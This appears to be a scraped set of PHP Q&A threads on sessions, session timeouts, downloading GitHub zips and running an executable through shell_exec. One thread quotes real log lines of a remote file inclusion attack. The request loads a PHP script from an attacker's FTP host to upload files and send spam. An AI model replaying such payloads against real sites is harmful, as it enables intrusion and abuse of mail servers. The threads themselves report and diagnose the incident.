I am trying to start session this way:
session.auto_start = 1
I set it this way. The session doesn't start. I changed start in my php as the following:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I dont see any file created in that folder.
Also when I do this:
$id=session_id();
I get $id=0;
Why all those mistakes happen?
I am trying to start session this way:
session.auto_start()
Where and how do you do that? Not in code I hope? It's a php.ini setting, and if you want to enable it, you have to do it there.
I changes start in my php as the following:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I dont see any file created in that folder.
Does the user as which PHP runs have permissions on that folder? Haven't you got your PHP files sorted in deeper folders, where "(directory)../User" doesn't exist? Have you tried echoing the path to see where it points? Have you tried manually writing a file there? What about using realpath()?
Also when I do this:
$id=session_id();
I get id=0;
That's a symptom. Your session doesn't start, so you can't get a session ID.
$os=$_SERVER['SERVER_SOFTWARE'];
I am trying to get the operating system and I get nothing.
What do you get? Tried var_dump($os)?
and when I try to do this: $browser= $_SERVER['HTTP_USER_AGENT']; I get weird browser.
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
That "Weird Browser" is Chrome 15. What's weird about that?
And please enable error reporting since I'm sure there'll be a few hints there.
Related
I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.
Some user is creating FTP folders with malicious commands. I analysed the apache log and found the following strange lines:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried test the command "pg=ftp://zkeliai..." like hacker did, but nothing happens, and I expected this. I'm very confused in how hacker the created a folder in my FTP.
Without knowing what $pg is being used for, it's not really possible to get what the hacker is doing, but it looks like he send a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitation with htmlspecialchars is to convert the one & in the string to &. When the request is processed by index.php, but, it will be converted back to & in an internal string as PHP will assume it was just URL encoded, so when index.php is sending its server-side request to Thumbr.php, the & is present and serves to send parameters to the FTP.
We had a similar issue on our university's site. We have over 2200 hits the last few days from this IP with two different .php pages: showcase.php and Thumbr.php
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure what was posted, it seems loading the ftp page (with the included credentials) into PHP with the $_GET[] managed to execute the content on that page? I'm unclear as to how that may work, but that seems to be what happened.
I am trying to download the Github repository as zip using php api. Can anyone help me to resolve this problem?
You can try
file_put_contents("master.zip",
file_get_contents("https://github.com/{group}/{project}/archive/master.zip")
);
But make sure allow_url_fopen is set in php.ini, then you can easily use file_get_contents()
You can combine these two puzzle pieces:
php download file: https://stackoverflow.com/a/3938551/2536029
github zips: https://github.com/$USER/$REPO/archive/$BRANCH.zip
e.g. https://github.com/bpowers/psm/archive/master.zip
First, build an URL like using this format:
https://api.github.com/repos/:owner/:repo/:archive_format/:ref
Then, use curl to visit that URL, but don't forget to:
Active follow location (CURLOPT_FOLLOWLOCATION), set to true.
Assign an user agent (CURLOPT_USERAGENT), for example 'Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0'.
If the repository is private, use your username and password (or token) to authenticate, setting CURLOPT_USERPWD to $youruser.':'.$yourpassortoken.
You can use CURLOPT_FILE to directly donwload to a file, just set that option to a previously opened file pointer created with fopen($filename, 'w').
Sorry, no sample code, but instructions are clear enough. It works.
As a newcomer to PHP, I need to get $_SESSION variables working as part of a larger project. I am finding that the I cannot transfer data between .php files using $_SESSION variables. I Googled for similar problems and found this solved problem.Same problem
I reduced my code to the exact same as the solution to the problem, but it still exists. I have
sesstest.php
<?php
session_start();
$_SESSION['test']="TEST SESSION TEXT";
header('location:sessreceive.php');
?>
sessreceive.php
<?php session_start();
echo $_SESSION['test'];
?>
I have cookies enabled and it is the same in Firefox and IE. The site I'm accessing is a Raspberry Pi on my home network. It is running Apache2 under a Linux version. The session part of my php.ini is
Could anyone please suggest what might be wrong, as I get no output in sessreceive.php?
Make sure that the session.save_path exists. Sometimes that is the problem.
Can try var_dump($_SESSION);, to see what exactly it contains.
Also, try echo session_id(); in both cases to ensure you're picking up the same session in both cases.
Make sure Apache can write to the session.save_path (/var/lib/php5)
I know this problem has been presented here in SO and I've tried the solutions but it's still not fixed.
PHP is deleting the session after some time of inactivity (i assume 24 minutes as it's the default and seems to fit the testing).
I have the following code set in all the pages:
ini_set('display_errors', 0);
$sessionCookieExpireTime = 2880000;
session_set_cookie_params($sessionCookieExpireTime);
ini_set('session.gc_maxlifetime', $sessionCookieExpireTime);
session_start();
echo ini_get('session.gc_maxlifetime'); //echos 2880000 as expected
But the session still gets reset after 24 minutes (or so) of inactivity.
phpinfo() return the following output for session:
Any idea why this isn't working? (PHP 5.3.10)
Thanks
Although Marc B answer shares some great insight it wasn't working for me. I was pretty sure everything was fine with my script and I had nothing messing with the session in my code.
After an epic struggle I discovered that my problem was actually due to shared hosting environment. From the PHP doc:
“If different scripts … share the same place for storing the session
data then the script with the minimum value will [determine the
session timeout]“.
After this the problem was quite obvious. Some script (hosted on the same server) was using the default php.ini session.gc_maxlifetime and that was resetting my sessions.
The solution was to create a folder under the root of my hosting (make sure it's not web accessible), set the right permissions to it and then use session.save_path to tell php where to store my sessions. Something like:
ini_set("session.gc_maxlifetime","21600"); // 6 hours
ini_set("session.save_path", "/your_home/your_sessions/");
session_start();
This website provided great insight: php sessions on shared hosting
So if you come accross this issue make sure you follow Marc B recommendations and if that doesn't work try this out.
Best wishes!!
Are you doing this code in EVERY script that uses sessions? ini_set changes apply ONLY to the script they're executed in, and ONLY for the execution lifetime of that particular script.
If you want to make it a permanent global change, you'll have to modify php.ini, or put some php_values directives into http.conf/.htaccess.
I want to run .exe (c++) file by php script. I tried very different combinations of exec command, but still my programs returned -2 (argv<6) or array (?), now I tried to use shell_exec
<?php
$params = array ('nnn.jpg', 'fff.jp2', '300', '300', '50');
$params_string = implode(" ", $params);
shell_exec('demo.exe '.$params_string);
echo 'demo.exe '.$params_string
?>
but it is not working too... I echoed the string I used, and it's just okay
I got it to send parameters properly, but program exits with error caused by write problem. I've changed all perms in target folder to "full control". Maybe there is something with php settings? (xampp on win7 x64)
demo.exe nnn.jpg fff.jp2 300 300 50
any ideas?
I got it to send parameters properly, but program exits with error caused by write problem. I've changed all perms in target folder to "full control". Maybe there is something with php settings? (xampp on win7 x64)
ERROR: Exception: demo.exe: no decode delegate for this image format `kush.jpg' # error/constitute.c/ReadImage/532-5
but as I said before, all goes well through cmd...
Problem was more server issue, dar7yl was almost correct, problem was apache haven't access to imagemagick lib, located in program files... I had to change apache user to my account, and now all works fine ;)